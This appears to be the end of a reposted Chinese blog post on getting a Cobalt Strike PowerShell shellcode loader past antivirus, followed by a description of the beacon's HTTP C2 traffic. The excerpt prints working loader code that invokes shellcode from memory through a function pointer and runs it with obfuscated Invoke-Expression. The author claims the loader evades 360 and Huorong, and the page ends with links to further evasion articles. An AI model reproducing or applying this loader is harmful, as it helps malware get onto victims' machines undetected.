$var_runme = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($var_buffer, (func_get_delegate_type @([IntPtr]) ([Void])))
$var_runme.Invoke([IntPtr]::Zero)
'@

If ([IntPtr]::size -eq 8) {
	start-job { param($a) I`e`x $a } -RunAs32 -Argument $DoIt | wait-job | Receive-Job
}
else {
	I`e`x $DoIt
}

放入靶機靜態查殺可以過360和火絨

動態也可以過,沒有任何反應
但是virustotal顯示14的查殺率,包括有360,但是虛擬機里並沒有報毒,可能360衛士再虛擬機和物理機環境的查殺表現真不一樣

http beacon流量

這里正好看一下Cs的http beacon流量
受控機默認60s輪詢一次,當服務端下達命令的時候,等待受控端連接
默認的C2配置,get請求來詢問是否有更新的命令,Cookie中有加密的詢問命令,當Get請求服務端返回200OK,並且返回有加密的流量就是服務端下達的命令

然后客戶端木馬程序拿到需要執行的命令執行后再次通過Post請求將執行命令返回的結果放在data數據中發送給服務端

免殺文章:
信安之路-記一次PowerShell免殺實戰
powershell免殺
Cobalt Strike——利用混淆處理繞過Windows Defender
問題解決:
Win7 process explorer運行提示winsta.dll缺少重要函數
解決=>安裝Windows6.1-KB2533623-x64.msu


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



猜您在找 powershell CS免殺上線 CS-Powershell免殺-過卡巴等殺軟上線 Powershell免殺從入門到實踐 shellcode隱寫到像素RGB免殺上線到CS 簡單的class文件加密解密及混淆工具 powershell代碼混淆繞過 powershell免殺 cs免殺系列 Powershell免殺 C/C++免殺CS shellcode實踐
 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM